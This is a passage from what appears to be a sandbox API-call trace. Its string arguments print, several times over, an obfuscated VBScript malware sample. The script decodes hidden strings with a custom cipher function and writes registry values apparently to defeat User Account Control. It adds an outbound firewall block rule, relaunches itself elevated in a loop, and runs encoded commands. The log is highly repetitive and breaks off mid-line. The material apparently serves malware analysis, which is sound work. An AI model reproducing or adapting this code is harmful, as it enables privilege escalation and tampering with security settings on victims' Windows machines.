bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0222.945] wcsncmp (_String1="hile (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0222.945] wcsncmp (_String1="ile (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.945] wcsncmp (_String1="le (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.945] wcsncmp (_String1="e (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 